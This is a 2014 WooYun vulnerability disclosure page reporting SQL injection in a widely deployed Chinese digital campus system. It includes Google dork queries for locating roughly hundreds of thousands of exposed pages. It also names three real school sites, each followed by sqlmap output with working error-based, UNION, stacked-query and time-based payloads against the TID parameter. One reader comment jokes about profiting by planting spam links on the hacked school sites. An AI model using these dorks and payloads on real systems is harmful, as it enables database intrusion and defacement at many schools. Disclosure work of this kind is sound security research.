当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-065457

漏洞标题:某通用型数字校园系统SQL注射漏洞(涉及大量学校)

相关厂商:cncert

漏洞作者: 神奇的路人甲

提交时间:2014-06-19 10:07

修复时间:2014-09-17 10:08

公开时间:2014-09-17 10:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-19: 细节已通知厂商并且等待厂商处理中
2014-06-23: 厂商已经确认,细节仅向厂商公开
2014-06-26: 细节向第三方安全合作伙伴开放
2014-08-17: 细节向核心白帽子及相关领域专家公开
2014-08-27: 细节向普通白帽子公开
2014-09-06: 细节向实习白帽子公开
2014-09-17: 细节向公众公开

简要描述:

0.0

详细说明:

无锡新座标教育技术有限公司 的数字化校园系统存在通用型SQL注射漏洞
装机量比较大。
谷歌关键词:intitle:校园 技术支持:无锡新座标教育技术有限公司
连接:

http://209.116.186.246/#newwindow=1&q=intitle:%E6%A0%A1%E5%9B%AD+%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%EF%BC%9A%E6%97%A0%E9%94%A1%E6%96%B0%E5%BA%A7%E6%A0%87%E6%95%99%E8%82%B2%E6%8A%80%E6%9C%AF%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8


近4000收录量

1.png


SQL注射点:
DPMA/FWeb/WorkRoomWeb/Web/Index.aspx?TID=
谷歌关键词:inurl:DPMA/FWeb/WorkRoomWeb/Web/Index.aspx?TID=
连接:

http://209.116.186.246/#newwindow=1&q=inurl:DPMA%2FFWeb%2FWorkRoomWeb%2FWeb%2FIndex.aspx%3FTID%3D


35w收录

8.png


案例1:
http://szxy.ncjy.net/DPMA/FWeb/WorkRoomWeb/Web/Index.aspx?TID=1000210106
---
Place: GET
Parameter: TID
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: TID=1000210106 AND 8259=CONVERT(INT,(SELECT CHAR(113)+CHAR(108)+CHA
R(105)+CHAR(117)+CHAR(113)+(SELECT (CASE WHEN (8259=8259) THEN CHAR(49) ELSE CHA
R(48) END))+CHAR(113)+CHAR(112)+CHAR(111)+CHAR(116)+CHAR(113)))
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: TID=1000210106 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(
113)+CHAR(108)+CHAR(105)+CHAR(117)+CHAR(113)+CHAR(114)+CHAR(88)+CHAR(111)+CHAR(9
8)+CHAR(103)+CHAR(113)+CHAR(117)+CHAR(115)+CHAR(100)+CHAR(99)+CHAR(113)+CHAR(112
)+CHAR(111)+CHAR(116)+CHAR(113),NULL,NULL,NULL,NULL--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: TID=1000210106 AND 2239=(SELECT COUNT(*) FROM sysusers AS sys1,sysu
sers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6
,sysusers AS sys7)
---
web server operating system: Windows
web application technology: ASP.NET, Nginx, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005

9.png


案例2:
http://www.azxx.net/dpma/FWeb/WorkRoomWeb/Web/Index.aspx?TID=3050010176
---
Place: GET
Parameter: TID
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: TID=3050010176 AND 3214=CONVERT(INT,(SELECT CHAR(113)+CHAR(102)+CHA
R(97)+CHAR(97)+CHAR(113)+(SELECT (CASE WHEN (3214=3214) THEN CHAR(49) ELSE CHAR(
48) END))+CHAR(113)+CHAR(102)+CHAR(104)+CHAR(122)+CHAR(113)))
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: TID=3050010176 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(
113)+CHAR(102)+CHAR(97)+CHAR(97)+CHAR(113)+CHAR(80)+CHAR(111)+CHAR(70)+CHAR(67)+
CHAR(84)+CHAR(104)+CHAR(108)+CHAR(66)+CHAR(76)+CHAR(87)+CHAR(113)+CHAR(102)+CHAR
(104)+CHAR(122)+CHAR(113),NULL,NULL,NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: TID=3050010176; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: TID=3050010176 WAITFOR DELAY '0:0:5'--
---
[21:49:18] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005


10.png

漏洞证明:

案例3:
http://www.fstc.pdedu.sh.cn/dpma/FWeb/WorkRoomWeb/Web/Index.aspx?TID=3300010006
---
Place: GET
Parameter: TID
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: TID=3300010006 AND 6531=CONVERT(INT,(SELECT CHAR(113)+CHAR(121)+CHA
R(105)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6531=6531) THEN CHAR(49) ELSE CHA
R(48) END))+CHAR(113)+CHAR(113)+CHAR(116)+CHAR(102)+CHAR(113)))
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: TID=3300010006 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(
113)+CHAR(121)+CHAR(105)+CHAR(113)+CHAR(113)+CHAR(90)+CHAR(106)+CHAR(66)+CHAR(10
4)+CHAR(97)+CHAR(81)+CHAR(114)+CHAR(119)+CHAR(86)+CHAR(77)+CHAR(113)+CHAR(113)+C
HAR(116)+CHAR(102)+CHAR(113),NULL,NULL,NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: TID=3300010006; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: TID=3300010006 WAITFOR DELAY '0:0:5'--
---
[21:50:39] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005


11.png

修复方案:

过滤

版权声明:转载请注明来源 神奇的路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-06-23 22:19

厂商回复:

CNVD确认并复现所述情况(两至三个实例确认通用性),通过公开联系渠道暂未获知软件生产厂商联系方式,待处置。

最新状态:

暂无


漏洞评价:

评论

  1. 2014-06-19 11:19 | 赵健康 ( 路人 | Rank:16 漏洞数:3 | 慢慢进步!!!)

    有我们学校没

  2. 2014-06-19 11:32 | 神奇的路人甲 ( 实习白帽子 | Rank:63 漏洞数:16 | 最神奇的一群人,智慧低调又内敛,俗称马甲...)

    @赵健康 看样子有

  3. 2014-06-19 11:39 | g00 ( 路人 | Rank:0 漏洞数:1 | 终于进来了~)

    楼主错失100W,学校站,挂黑链,一年100w,5年能混北京户口,4年能换绿卡~~~

  4. 2014-06-19 13:38 | 牛博恩 ( 路人 | Rank:21 漏洞数:3 | Oh god my savior)

    @g00 100w还不够在北京买房的。

  5. 2014-06-19 13:52 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    @g00 100W再送一副925纯银手镯